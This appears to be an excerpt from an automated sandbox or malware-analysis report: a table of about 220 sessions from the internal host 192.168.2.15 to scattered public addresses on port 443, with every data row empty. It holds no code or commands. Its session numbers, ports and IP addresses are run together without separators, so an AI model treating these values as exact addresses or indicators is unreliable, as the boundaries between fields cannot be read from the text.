                                            19622192.168.2.153415641.75.240.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19623192.168.2.1551690206.132.25.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19624192.168.2.1543956131.133.96.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19625192.168.2.15384948.135.20.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19626192.168.2.1554376162.160.186.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19627192.168.2.1547556200.75.239.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19628192.168.2.154403659.134.41.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19629192.168.2.1533642213.141.104.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19630192.168.2.155004486.31.248.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19631192.168.2.15546884.14.11.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19632192.168.2.1548174187.254.164.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19633192.168.2.154743853.26.120.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19634192.168.2.1537074166.220.231.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19635192.168.2.1544104171.5.137.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19636192.168.2.1559350183.147.232.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19637192.168.2.1534878101.107.149.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19638192.168.2.1559332221.154.98.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19639192.168.2.1554800142.248.72.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19640192.168.2.1560052218.131.206.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19641192.168.2.1550142142.192.125.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19642192.168.2.1559252210.87.117.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19643192.168.2.154414034.204.47.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19644192.168.2.1542504183.227.26.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19645192.168.2.1548234117.144.136.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19646192.168.2.1554096109.194.50.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19647192.168.2.155780898.39.75.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19648192.168.2.1540878171.230.180.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19649192.168.2.1553280219.215.69.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19650192.168.2.1540028142.90.85.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19651192.168.2.1548342177.49.207.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19652192.168.2.153710284.111.166.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19653192.168.2.155522476.227.190.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19654192.168.2.155154896.23.204.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19655192.168.2.153320697.206.220.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19656192.168.2.1559790187.106.159.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19657192.168.2.1559176107.166.77.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19658192.168.2.155944258.122.25.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19659192.168.2.154152684.3.29.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19660192.168.2.1546086184.14.75.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19661192.168.2.154154059.213.254.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19662192.168.2.153877691.1.67.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19663192.168.2.1540412185.100.224.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19664192.168.2.154232018.55.207.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19665192.168.2.1536326118.148.172.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19666192.168.2.154035240.1.130.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19667192.168.2.154152278.128.81.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19668192.168.2.154757664.14.218.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19669192.168.2.154575073.95.38.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19670192.168.2.154578872.181.227.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19671192.168.2.155336040.118.170.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19672192.168.2.1560826149.5.53.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19673192.168.2.1550724207.73.248.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19674192.168.2.154181078.107.194.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19675192.168.2.1542512199.116.99.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19676192.168.2.1534846212.203.115.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19677192.168.2.1542882183.134.0.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19678192.168.2.153791413.114.0.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19679192.168.2.153949499.208.170.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19680192.168.2.1543274103.66.8.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19681192.168.2.1556552180.105.86.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19682192.168.2.154157490.35.23.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19683192.168.2.15353164.224.200.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19684192.168.2.1536082104.173.109.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19685192.168.2.1559642139.134.232.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19686192.168.2.1546760147.72.100.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19687192.168.2.155149880.45.251.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19688192.168.2.1557048161.116.64.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19689192.168.2.154289482.162.54.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19690192.168.2.154998653.181.241.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19691192.168.2.154275624.104.15.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19692192.168.2.1557262191.224.148.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19693192.168.2.1539600175.166.246.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19694192.168.2.155931680.24.154.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19695192.168.2.1539740211.31.108.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19696192.168.2.1535786125.209.19.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19697192.168.2.1538906217.2.143.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19698192.168.2.154045857.118.188.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19699192.168.2.1538010166.76.248.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19700192.168.2.1535704211.245.43.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19701192.168.2.1551814125.74.76.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19702192.168.2.1543120186.35.163.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19703192.168.2.1539678203.38.63.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19704192.168.2.1534568116.222.142.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19705192.168.2.154686297.166.163.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19706192.168.2.1560144171.204.5.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19707192.168.2.1557038102.20.154.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19708192.168.2.153343058.90.152.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19709192.168.2.154585869.96.177.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19710192.168.2.155003483.22.205.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19711192.168.2.1544982161.200.163.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19712192.168.2.1533218150.28.232.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19713192.168.2.1556398208.43.173.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19714192.168.2.154967463.146.22.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19715192.168.2.1539326132.204.8.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19716192.168.2.155944662.217.16.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19717192.168.2.1545364193.43.21.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19718192.168.2.1547844118.81.212.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19719192.168.2.1542418223.41.137.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19720192.168.2.1548248159.103.100.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19721192.168.2.1536996206.86.106.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19722192.168.2.1558760166.109.171.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19723192.168.2.1548480157.175.65.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19724192.168.2.1559682166.113.53.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19725192.168.2.154358218.237.52.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19726192.168.2.155046661.170.26.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19727192.168.2.153865883.15.201.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19728192.168.2.1558680217.232.102.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19729192.168.2.1551330150.87.95.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19730192.168.2.1535726183.117.234.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19731192.168.2.1560096124.251.165.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19732192.168.2.1536356207.130.156.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19733192.168.2.153772262.197.208.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19734192.168.2.1551170138.37.67.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19735192.168.2.1545102115.51.61.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19736192.168.2.153798646.88.179.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19737192.168.2.1540620128.3.107.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19738192.168.2.155696486.135.97.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19739192.168.2.1538954141.190.22.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19740192.168.2.154256063.111.144.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19741192.168.2.155549235.59.185.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19742192.168.2.154851624.180.51.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19743192.168.2.1538350161.226.252.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19744192.168.2.153816088.235.200.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19745192.168.2.1548996119.183.239.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19746192.168.2.1534930182.25.237.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19747192.168.2.1544998180.25.63.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19748192.168.2.155931674.202.199.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19749192.168.2.154715098.149.147.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19750192.168.2.1549414142.124.70.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19751192.168.2.1547608187.146.20.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19752192.168.2.1548596156.42.204.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19753192.168.2.155908698.253.74.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19754192.168.2.1535294174.88.234.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19755192.168.2.1534636125.175.233.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19756192.168.2.155933049.245.185.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19757192.168.2.1544216123.197.151.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19758192.168.2.155768686.246.205.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19759192.168.2.154359036.93.51.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19760192.168.2.1552560171.5.27.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19761192.168.2.154404449.144.80.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19762192.168.2.155549494.175.16.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19763192.168.2.1553048120.121.209.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19764192.168.2.153948068.126.144.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19765192.168.2.1537830158.211.0.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19766192.168.2.15507009.166.85.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19767192.168.2.1544620212.110.226.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19768192.168.2.1541864170.90.145.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19769192.168.2.1555226177.84.60.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19770192.168.2.1535980222.132.216.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19771192.168.2.1545864169.193.170.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19772192.168.2.154441676.139.210.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19773192.168.2.1549406102.118.159.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19774192.168.2.1542440133.25.72.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19775192.168.2.1560076185.68.115.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19776192.168.2.153775649.62.72.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19777192.168.2.1557012144.178.57.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19778192.168.2.1542750131.251.176.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19779192.168.2.1546302205.228.209.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19780192.168.2.153731846.200.193.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19781192.168.2.1548298223.33.215.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19782192.168.2.155446845.102.176.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19783192.168.2.155945831.157.28.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19784192.168.2.154511037.247.18.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19785192.168.2.153934814.236.98.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19786192.168.2.1544556219.128.207.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19787192.168.2.1536480218.187.123.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19788192.168.2.154394449.127.2.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19789192.168.2.154017666.181.68.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19790192.168.2.154927080.255.28.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19791192.168.2.1546942209.123.77.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19792192.168.2.1549358201.190.16.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19793192.168.2.153572891.251.84.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19794192.168.2.156064473.61.167.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19795192.168.2.1537378207.125.69.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19796192.168.2.1558090107.238.179.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19797192.168.2.154008885.161.180.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19798192.168.2.153431276.166.8.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19799192.168.2.1536418114.88.157.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19800192.168.2.1560454125.195.207.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19801192.168.2.155411675.77.157.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19802192.168.2.1545088139.246.224.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19803192.168.2.153855278.117.47.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19804192.168.2.153776438.210.103.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19805192.168.2.15536522.191.79.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19806192.168.2.154387477.59.246.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19807192.168.2.1548686172.190.167.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19808192.168.2.155692460.165.67.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19809192.168.2.1553066156.30.0.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19810192.168.2.1557938159.78.195.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19811192.168.2.1552482151.51.24.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19812192.168.2.1556490159.44.137.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19813192.168.2.155678212.12.26.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19814192.168.2.1535392138.192.162.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19815192.168.2.1533468171.124.25.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19816192.168.2.155549068.240.16.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19817192.168.2.1540672185.254.198.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19818192.168.2.154680665.215.129.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19819192.168.2.1543634137.238.135.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19820192.168.2.1554154144.22.181.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19821192.168.2.1554086137.44.151.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19822192.168.2.1545560101.72.8.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19823192.168.2.1559630165.189.10.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19824192.168.2.155704234.54.144.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19825192.168.2.155273237.30.254.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19826192.168.2.155395661.79.176.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19827192.168.2.1536844205.208.77.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19828192.168.2.1546886190.177.18.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19829192.168.2.154167294.219.3.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19830192.168.2.1555780128.98.51.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19831192.168.2.1536714167.120.221.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19832192.168.2.1540962118.87.34.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19833192.168.2.1535678125.19.183.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19834192.168.2.1541776134.150.152.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19835192.168.2.1551402162.116.227.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19836192.168.2.155325814.49.52.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19837192.168.2.1534026171.188.93.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19838192.168.2.1558542217.96.42.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19839192.168.2.1555114167.163.100.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19840192.168.2.156017420.164.84.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19841192.168.2.15444661.158.182.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19842192.168.2.155318440.106.50.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19843192.168.2.153945452.24.18.25443
                                            TimestampBytes transferredDirectionData


